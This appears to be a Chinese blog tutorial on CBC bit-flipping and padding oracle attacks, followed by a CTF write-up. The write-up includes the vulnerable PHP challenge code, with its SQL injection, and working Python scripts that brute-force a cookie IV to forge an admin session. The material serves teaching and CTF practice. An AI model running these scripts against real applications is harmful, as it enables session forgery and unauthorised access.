CBC字节翻转攻击解析

最新推荐文章于 2023-07-25 21:48:51 发布
最新推荐文章于 2023-07-25 21:48:51 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gental_z/article/details/107937170
版权

CBC字节翻转攻击解析

一、分组密码的模式

分组密码的主要模式有5种:

  1. ECB模式(电子密码本模式)—(Electronic CodeBook mode)
  2. CBC模式(密码分组链接模式)—(Cipher Block Chaining mode)
  3. CFB模式(密文反馈模式)—(Cipher FeedBack mode)
  4. OFB模式(输出反馈模式)—(Output FeedBack mode)
  5. CTR模式(计数器模式)—(CounteR mode)

这里只详细介绍CBC密码分组链接模式:通过下图简要介绍

image-20200808220903785

首先,我们给定一组明文,我们按照AES或者DES加密标准,将数据分成几块,每一块的大小可以是16字节,32字节等(将文明分为上面图示的明文分组)

然后我们给定一个长度和分组相同的初始化向量(IV),与每一块明文分组进行异或操作,将得到的数据通过密钥加密,得到密文分组。得到的当前一块的密文分组作为下一个块加密的初始化向量。(如图所示)

二、CBC字节翻转攻击

该攻击,可以使我们在已知密文的情况下,控制明文为我们想要的数据。(后面介绍的padding oracle attack不仅可以控制明文,还可以获取明文数据)

image-20200808220903785

还是通过上面的图来介绍,这里探究一下解密的过程:(从后往前)

例如,通过正常的解密,我们要得到明文分组4,应该怎么做:

将密文分组4解密后与密文分组3异或,便得到明文分组4

(这里稍微介绍一下异或的性质,例如A异或B得到C,那么C异或B也会得到A)

因为我们一般情况下,都会知道密文。我们可以任意修改密文分组3,当他与密文分组4解密后的那一部分异或后,那么得到的明文分组就与之前的不同。

(我们可以尽量尝试构造密文分组的每一位------因为我们知道异或是位的运算)

到这里,我们就可以伪造明文分组4为我们想要构成的数据(尽管我们不知道密文分组4的解密密钥是什么,但我们仍然可以任意构造明文分组4)

同理,明文分组3、明文分组2我们都可以通过前一个密文分组来自定义构造我们想要的值(至于第一部分,如果我们知道最初的初始化向量IV,那么也是可以构造的)

三、Padding Oracle Attack攻击

首先介绍一下数据块的填充规则,常见的有PKCS #5和PKCS #7分别填充的是8字节分组和16字节分组。

例如我们采用PKCS #7的填充方式,给定一串明文"m1sn0w",长度为6,因为PKCS #7填充的是16字节组分,所有需要填充10个字节,让填充的字节是16的整数倍。那么填充的字符是什么?答案是0x0a(16进制表示的10)

以此类推:

如果明文长度为15,我们需要填充一个字节0x01
如果明文长度为14,我们需要填充两个个字节0x02

这里特别需要注意的是:如果明文长度为16的整数字节长,它也需要填充
它会一次填充16位,且填充的字符为0x10

下面介绍一下关于Padding Oracle Attack攻击的一些条件。

首先需要介绍的是一般对于CBC模式的解密,有几种判断情况:

1、正常解密,得到明文

2、解密成功,但是解密得到的和明文不匹配

3、解密错误,抛出异常

这里要特别提一下解密错误:当我们第一串密文进行CBC模式的解密的时候,解密完成以后,程序会通过最后解密出来的明文的填充符来判断是否解密成功。

例如:

如果解密出来的明文最后的1位填充符为0x01,那么程序判定解密成功

相反,如果解密出来只有最后一位为0x02,那么程序会判断解密错误(因为我们知道,如果填充符为0x02,那么应该是最后两位为0x02)

在Web应用程序中,我们通常会有三种逻辑判断。(例如加密数据用于cookie)

1、如果cookie正常解密,且明文匹配,那么我们可以直接进入网页

2、cookie正常解密,但是解密出来的明文不符合,仍然不可以登录

3、cookie解密错误,抛出500错误

如果网页存在以上情况,就可能存在padding oracle attack攻击,那么该攻击如何实现?

这里利用的还是上面介绍到的CBC翻转攻击,还是用该图示来介绍:

image-20200808220903785

我们知道,构造密文分组3,可以任意构造出明文分组4的值。

通过上面的三种逻辑判断,如果我们构造密文分组3的最后一位,通过试探穷举,明文分组4的最后一位总会得到0x01的。

假设我们处在上方的Web应用程序环境中,只有正确构造出密文分组3的最后一位,使明文分组4的最后一位为0x01,那么程序才不会返回500的错误。

然后我们将密文分组3的最后一位与0x01异或,便得到密文分组4解密后的最后一位的值(通过异或的性质得到)

如此循环:

通过第一步,我们得到最后一位的中间值,然后我们构造密文分组3的倒数第二个和倒数第一个(倒数第一个就比较好构造,因为我们已经知道了中间值),使明文分组4的最后两个为0x02,从而我们就可以得到倒数第二位的中间值(依次重复,构造0x03,0x04,最终我们将得到所有密文分组通过解密后的这一串中间值)

那么想要得到明文数据就很简单了,因为我们已经知道了中间值,又知道了密文,只需要进行相应的异或,便可以得到明文数值。

四、NJCTF Web Be Admin

该题是一个padding oracle attack攻击的比较典型的一个例子。

(复现的源代码在github上直接就可以搜到)

拿到改题目,通过文件备份,拿到源码:

<?php
include 'config.php';
error_reporting(0);
define("SECRET_KEY", "this_is_key_you_do_not_know");
define("METHOD", "aes-128-cbc");

session_start();

function get_random_token(){
    $random_token='';
    for($i=0;$i<16;$i++){
        $random_token.=chr(rand(1,255));
    }
    return $random_token;
}

function get_identity()
{
    global $defaultId;
    $j = $defaultId;
    $token = get_random_token();
    $c = openssl_encrypt($j, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $token);
    $_SESSION['id'] = base64_encode($c);
    setcookie("ID", base64_encode($c));
    setcookie("token", base64_encode($token));
    if ($j === 'admin') {
        $_SESSION['isadmin'] = true;
    } else $_SESSION['isadmin'] = false;

}

function test_identity()
{
    if (!isset($_COOKIE["token"]))
        return array();
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"]))) {
            if ($u === 'admin') {
                $_SESSION['isadmin'] = true;
            } else $_SESSION['isadmin'] = false;
        } else {
            die("ERROR!");
        }
    }
}

function login($encrypted_pass, $pass)
{
    $encrypted_pass = base64_decode($encrypted_pass);
    $iv = substr($encrypted_pass, 0, 16);
    $cipher = substr($encrypted_pass, 16);
    $password = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);
    
    return $password == $pass;
}



function need_login($message = NULL) {
    echo "   <!doctype html>
        <html>
        <head>
        <meta charset=\"UTF-8\">
        <title>Login</title>
        <link rel=\"stylesheet\" href=\"CSS/target.css\">
            <script src=\"https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js\"></script>
        </head>
        <body>";
    if (isset($message)) {
        echo "  <div>" . $message . "</div>\n";
    }
    echo "<form method=\"POST\" action=''>
            <div class=\"body\"></div>
                <div class=\"grad\"></div>
                    <div class=\"header\">
                        <div>Log<span>In</span></div>
                    </div>
                    <br>
                    <div class=\"login\">
                        <input type=\"text\" placeholder=\"username\" name=\"username\">
                        <input type=\"password\" placeholder=\"password\" name=\"password\">               
                        <input type=\"submit\" value=\"Login\">
                    </div>
                     <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
            </form>
        </body>
    </html>";
}

function show_homepage() {
    echo "<!doctype html>
<html>
<head><title>Login</title></head>
<body>";
    global $flag;
    printf("Hello ~~~ ctfer! ");
    if ($_SESSION["isadmin"])
        echo $flag;
    echo "<div><a href=\"logout.php\">Log out</a></div>
</body>
</html>";

}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = (string)$_POST['username'];
    $password = (string)$_POST['password'];
    $query = "SELECT username, encrypted_pass from users WHERE username='$username'";
    $res = $conn->query($query) or trigger_error($conn->error . "[$query]");
    if ($row = $res->fetch_assoc()) {
        $uname = $row['username'];
        $encrypted_pass = $row["encrypted_pass"];
    }
    
    if ($row && login($encrypted_pass, $password)) {
        echo "you are in!" . "</br>";
        get_identity();
        show_homepage();
    } else {
        echo "<script>alert('login failed!');</script>";
        need_login("Login Failed!");
    }

} else {
    test_identity();
    if (isset($_SESSION["id"])) {
        show_homepage();
    } else {
        need_login();
    }
}

简单审计之后,大致的利用过程如下:

1、通过sql的union注入,登录进去,获取到SESSION['id']的值

	登录过后,会返回cookie的token值

2、然后我们通过test_identity函数,进行padding oracle attack攻击

这里主要介绍一下test_identity函数:

function test_identity()
{
    if (!isset($_COOKIE["token"]))
        return array();
    if (isset($_SESSION['id'])) {
        $c = base64_decode($_SESSION['id']);
        if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"]))) {
            if ($u === 'admin') {
                $_SESSION['isadmin'] = true;
            } else $_SESSION['isadmin'] = false;
        } else {
            die("ERROR!");
        }
    }
}

其中,实施攻击的部分主要是在这里:

if ($u = openssl_decrypt($c, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, base64_decode($_COOKIE["token"])))

我们不知道SECRET_KEY,也就是密钥,也不知道 c 明 文 , 但 是 , 我 们 可 以 控 制 c明文,但是,我们可以控制 c_COOKIE[“token”],并且他在这里作为了初始化向量IV

(该题目正好符合我们所假设的Web环境,如果解密出错,die(“ERROR”))

那么我们就可以通过不断的构造$_COOKIE[‘token’]的值,最终伪造出一个明文,其值为admin0x0b0x0b0x0b0x0b0x0b0x0b0x0b0x0b0x0b0x0b0x0b

下面给出一个自己写的脚本:

import base64
import requests
from binascii import a2b_hex
import urllib

def deal_hex(index):
    tmp = hex(index)
    if index > 15:
        return a2b_hex(tmp[2:])
    else:
        return a2b_hex('0'+tmp[2:])

def padding(token,pad):
    tmp_token = token
    if len(middle_value) != 0:
        for index in middle_value:
            tmp_token += deal_hex(index ^ pad)
    return tmp_token


url = "http://121.41.113.245:8085/"
token = "A0KKqNuqv5jpnfe62FGFpw%3D%3D"
urldeal = urllib.parse.unquote(token)
tokens = base64.b64decode(urldeal)

middle_value = []
for j in range(16):
    change = j + 1
    tmp_index = 16-j-1
    tmp_token = tokens[0:tmp_index]
    for i in range(0, 255):
        ch = deal_hex(i)
        # print(len(tokens[0:15] + ch))
        newtoken = padding(tmp_token+ch,change)
        newtoken = urllib.parse.quote(str(base64.b64encode(newtoken),encoding='utf-8'))
        #print(newtoken)
        # print(newtoken)
        header = {
            "Cookie": "PHPSESSID=fhgkecm8p2dr0meg854g728706;ID=riMd%2FSaFOw%2BDBDOkLkGukw%3D%3D;token=" + newtoken
        }
        r = requests.post(url, headers=header)
        if "ERR" not in r.text:
            middle_value.insert(0,change ^ i)
            print(middle_value)
            break

该脚本获取中间值(也就是密文解密的那一部分值)—(此脚本存在一点点缺陷,不能获取第一位的中间值,所以使用下面的脚本直接对第一个值进行爆破)

import requests
import base64
from binascii import a2b_hex
import urllib

def deal_hex(index):
    tmp = hex(index)
    if index > 15:
        return a2b_hex(tmp[2:])
    else:
        return a2b_hex('0'+tmp[2:])
url = "http://121.41.113.245:8085/"
inin_iv = [0, 83, 130, 178, 193, 170, 191, 152, 233, 157, 247, 186, 216, 81, 133, 173]
for i in range(0,255):
    inin_iv[0] = i
    token = b''
    for i in inin_iv:
        token += deal_hex(i)
    newtoken = urllib.parse.quote(str(base64.b64encode(token),encoding='utf-8'))
    header = {
        "Cookie": "PHPSESSID=fhgkecm8p2dr0meg854g728706;ID=riMd%2FSaFOw%2BDBDOkLkGukw%3D%3D;token=" + newtoken
    }
    r = requests.post(url, headers=header)
    if "{" in r.text:
        print(r.text)

其中的inin_iv是第一个脚本获取的值与要构造的明文的异或的值。

最终得到flag

<!doctype html>
<html>
<head><title>Login</title></head>
<body>Hello ~~~ ctfer! CTFTraining{CoColi_has_to_work_hard}<div><a href="logout.php">Log out</a></div>
</body>
</html>

参考链接:

https://www.freebuf.com/articles/database/151167.html

swtre33
关注
专栏目录
汽车网络安全 -- MAC介绍:CMACCBC-MAC不能混为一谈
认真搞搞汽车MCU
08-02 623
MAC全称Message authentication code,是经过特定算法后产生的一小段数据信息,用于校验某数据的完整性和真实性。在数据传递过程中,可检查其内容是否被更改过,不管更改的原因是来自意外或是蓄意攻击。同时可以作为数据来源的身份验证,确认数据的来源。常见的MAC算法包括CMAC和HMAC
web渗透--35--Padding Oracle攻击
武天旭的博客
09-21 2781
1、漏洞描述: Padding Oracle攻击指应用在解密客户端提交的加密数据时,泄露了解密数据的分段填充是否合法的信息。攻击者利用Padding Oracle可以在不知道加密程序所使用的密钥的情况下,解密数据或者加密任意数据。即使应用程序确认加密数据的完整性,仍会导致该程序仍有敏感数据泄露和越权漏洞的风险。 密文在被解密时,会被分成若干个数据块,每个数据块有固定的长度,常见的加密算法大多为8字...
CBC-MAC
weixin_38664664的博客
09-18 8558
MAC全称为Message Authentication Code(消息认证码)。MAC是用来保证数据完整性的一种工具。数据完整性是信息安全的一项基本要求,它可以防止数据未经授权被篡改。随着网络技术的不断进步,尤其是电子商务的不断发展,保证信息的完整性变得越来越重要,特别是双方在一个不安全的信道上通信时,就需要有一种方法保证一方所发送的数据能够被另一方验证是正确的、未经篡改的。 用数学的语言来描述,
cbc字节翻转攻击
Xi4or0uji
09-19 1322
本来很久之前就应该把它学了,但是不能静下心看完,拖到现在......... 今天上课的时候跟cg一起看,抱着神仙的大腿将它看完了,cg牛逼!! 首先我们先看下他的加密过程 可以看到,它先将明文进行分块,第一块与初始变量异或,然后秘钥进行加密,得到的密文再与第二块明文进行异或,继续秘钥加密,以此类推,加密过程有个最显著的特点就是:前一个密文用来产生后一个密文 接下来是解密的过程,其实懂了...
CBC字节翻转攻击
Yale的博客
03-22 1617
首先了解下什么是CBCCBC全称Cipher Block Chaining模式(密文分组链接模式),“分组“是指加密和解密过程都是以分组进行的。每一个分组大小为128bits(16字节),如果明文的长度不是16字节的整数倍,需要对最后一个分组进行填充(padding),使得最后一个分组长度为16字节。“链接”是指密文分组分组像链条一样相互连接在一起。 CBC模式的加密: 加密时,第一个明文分组...
CBC翻转字节攻击
weixin_44843084的博客
06-13 478
CBC翻转字节攻击 CBC加密过程(密文分组链接模式 异或后加密 攻击点为IV或者加密后的某段密文 改第一组明文的信息,需要更改IV $A = Plaintext[0] = 'h' ; $B = IV[0] = 可控; $C = Decrypt(Ciphertext)[0] = ?; //所以我们需要伪造一个新的IV向量,使得$C ^ New_IV = 我们需要的明文 //因为有 $C ^ Old_IV = Source_str //所以 $C = Old_IV ^ Source_str //并且
CBC字节翻转攻击介绍 & 例题
最新发布
Emmaaaaa's blog
07-25 1230
CBC字节翻转攻击介绍 & 例题
MAC长度拓展攻击
CTFwp笔记1-rsa基本知识+共模攻击
04-17 1168
MAC长度拓展攻击 题目: ​ 对于MAC算法:KeyedHash=Hash(Key||Message),请仿照长度扩展攻击的思路,进行伪造攻击。即已知消息M及其MAC值T,如何伪造另一个满足验证的消息M’和MAC值T’,请说明消息M’的表达式及T’是如何计算的。 解: ​ 绘制MD结构: ​ M按照一定长度的比特分组成M0,M1...Mt{M_0,M_1...M_t}M0​,M1​...Mt​,如果MtM_tMt​长度不足分组要求,就在后面添加一个1和一定数量的0,并用最后的8个字节写上M的总长
Padding Oracle Attack 分析
4ct10n
05-12 8938
Padding Oracle Attack是一个经典的攻击,在《白帽子讲web安全》有一章提到Padding Oracle Attack的攻击方式,本篇文章结合着NJCTF的Be admin 进行详细的讲解,扫除知识上的盲点。 本篇文章讲解的顺序是攻击原理、攻击条件、本地测试、结果分析与总结四个方面进行详细的讲解。
OWASP Mutillidae 靶机实验指导书
06-08
包括层叠样式表注入、CBC字节翻转、命令注入、帧源注入、HTML注入、HTTP参数污染、JavaScript注入、JSON注入、参数添加、XML外部实体注入、XML实体扩展、XML注入、XPath注入等,均展示了各种注入攻击的原理和影响。...
vue+koa2实现session、token登陆状态验证的示例
10-16
但Token登录也有其缺点,比如在加密或解密过程中可能产生一些性能开销,而且对称加密算法中存在安全隐患,例如aescbc字节翻转攻击。 在Node.js中,Koa2是一个轻量级的Web应用框架,通过koa-session中间件来实现...
简单实现AES-CBC-MAC算法
11-15
利用jce简单实现了CBC-MAC算法,程序主要完成了子密钥生成算法、以及MAC的生成。
4.4 CBC-MAC
知与谁i的博客
09-20 4656
文章目录序The Basic Construction 序  从定理4.6和定理4.8可以得出,可以通过固定长度的伪随机函数构造任意长度message的安全MAC。其基于block ciphers,但效率较低:对于长度为dn的message,block ciphers需要计算4d次(在MAC和Vrfy过程中分别把m分成d组,每组长度为n,同时两个阶段都需要计算t);tag t的长度超过4dn位(每...
密码学学习笔记(三):MAC - 消息认证码
weixin_54634208的博客
06-29 1935
MAC在对称密钥设置中提供真实性/完整性预期的安全级别:所选消息下的不可伪造性攻击(UF-CMA),无法通过错误检测代码实现CBC-MAC是一种基于伪随机函数的安全构造,HMAC是另一个基于散列函数的函数MAC不提供防止重放攻击的保护MAC不提供不可否认性注:缩写的密码原语可以看之前的笔记,都有介绍过。
消息认证码(MAC)解读
热门推荐
当赤道留住雪花
11-10 2万+
MAC(消息认证码)解读 背景 在开放的计算和通信世界(例如Internet)中,我们会使用不可靠的媒介传输和存储信息。而对信息完整性(integrity)的校验在某些情景下就十分重要。基于密钥作完整性校验的方法常称为MAC(Message Authentication Code)。通常MAC在共享密钥的双方之间,校验相互传递的信息。 实现过程 使用 MAC 验证消息完整性的具体过程是:假设通信双...
CBC字节反转攻击详解
qq_45698157的博客
11-17 4829
前言 CBC全称为密码分组链接模式。不同于ECB模式,在CBC模式中,每个明文块先与前一个密文块儿进行异或后,在进行加密。这种加密模式很好的隐藏了明文的统计特性,但是同样也暴露出了一个很严重的缺点。本文将针对CBC模式的特点,详细讲解字节反转攻击的原理及应用。 一、CBC加密模式 Plaintext:明文 IV:初始化向量 Ciphertext:加密后的数据 Key:密钥 加密过程转化成文字来叙述: 先将Plaintext分组(常见以16字节为一组) 生成初始化向量IV和密钥K
分组密码的工作模式有哪些?各有什么优缺点
xiaoqiaoliushuiCC的博客
04-12 1万+
分组密码的工作模式有哪些?各有什么优缺点 参考: https://www.fisec.cn/316.html 1、电子密码本ECB(Electronic codebook) 需要加密的消息按照块密码的块大小被分为数个块,并对每个块进行独立加密。 适用于数据较少的情况,比如加密秘钥 优点:简单、快速、支持并行计算(加解密)。 缺点:同样的明文组会被加密成相同的密文组。因此不能很好地隐藏数据模式。...
AES CBC/CTR 加解密原理
weixin_34221332的博客
06-27 806
So, lets look at how CBC works first. The following picture shows the encryption when using CBC (in this case, using AES as the cipher). Basically, Cipher-Block-Chaining means that previous to putt...
AES CCM模式理解
悦途的专栏
02-17 5646
AES CCM模式理解 涉及概念 AES CCM加密模式使用CBC_MAC和CTR加密模式实现 L长度域,涉及CBC_MAC计算和CTR计算两个计算过程理解,具体见计算过程描述。 M为输出Tag长度。 Tag为校验值内容,具体见计算过程描述。 输出内容包括CTR加密结果和Tag值。 计算过程 CBC_MAC计算 <上图引用网络资源> 构造B0、B1……、Bn,每组16个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值